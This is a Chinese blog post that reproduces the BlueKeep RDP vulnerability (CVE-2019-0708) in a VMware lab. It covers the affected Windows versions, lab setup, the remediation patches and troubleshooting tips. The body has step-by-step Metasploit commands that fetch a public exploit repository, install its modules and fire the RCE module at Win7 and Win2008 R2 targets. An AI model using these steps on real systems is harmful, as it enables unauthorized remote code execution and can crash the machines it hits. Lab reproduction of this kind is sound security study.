前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-0708:RDP终极EXP爆出

CVE-2019-0708:RDP终极EXP爆出

作者头像
用户1631416
发布2019-09-17 17:45:05
2K0
发布2019-09-17 17:45:05
举报

0x00 漏洞概述


CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。

2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。

0x01 影响版本


Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8和Windows 10及之后版本的用户不受此漏洞影响

0x02 漏洞原理


由于对象指针在释放后再次被使用而引发UAF漏洞,详情见

https://www.anquanke.com/post/id/181577

0x03 环境搭建


本次复现版本为win7 sp1和win08 R2

Vmware环境下载链接:

win7 sp1:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

win08 R2:

ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/

Kali:https://www.kali.org/downloads/

以上环境自行百度安装即可

环境准备:

win7 sp1 - 192.168.10.10

win08 R2 - 192.168.10.6

kali - 192.168.10.9

win7 sp1 准备:

开启3389:

win08 R2准备:

开启3389:

修改注册表:

Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0

kali 准备:

下载需要的文件

Git clone https://github.com/TinToSer/bluekeep-exploit

可以看到有四个.rb后缀的文件,接下来将它们放至相应的目录(rdp目录需要自己创建)

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

查看文件是否复制成功

0x04 漏洞利用-win7


启动msf:

Msfconsole

重新加载所有模块(重要):

reload_all

搜索漏洞模块

search 2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce   //使用攻击模块
set rhosts 192.168.10.10  //设置目标主机(win7 sp1)
set rport 3389   //设置目标端口
set target 3
target 0 Automatic\ targeting\ via\ fingerprinting
target 1 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64)
target 2 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ Hyper-V)
target 3 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ VMWare)
target 4 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ Virtualbox)

这里用的是VMWare,所以选择target 3

Show options   //查看设置情况
Run   //执行

0x05 漏洞利用-win08


win2008 R2也是同样的操作命令

Msfconsole   //启动maf
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce   //使用攻击模块
set rhosts 192.168.10.6   //设置目标主机(win08 R2)
set rport 3389   //设置目标端口
set target 3   //同win7 target相同
Show options   //查看设置情况
Run   //执行

0x06 修复方式


下载补丁:

Win7 sp1:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Win08 R2:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

复现失败的一些小tip:

1、确认目录下已经拷贝了相应文件

2、确认3389开启,msf中reload_all执行

3、kali的内存给3个G左右

4、切换target 1/2/4

5、多run几次!(重点)

小结:目前exp还很不稳定,建议大家在实战中暂时不要使用,如果打蓝屏可能会造成很严重的后果。复现时可能会出现诸多问题,但是只要耐心地多尝试几次总会成功的

参考链接:

http://www.nmd5.com/?p=409#comment-46

https://github.com/rapid7/metasploit-framework/pull/12283

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档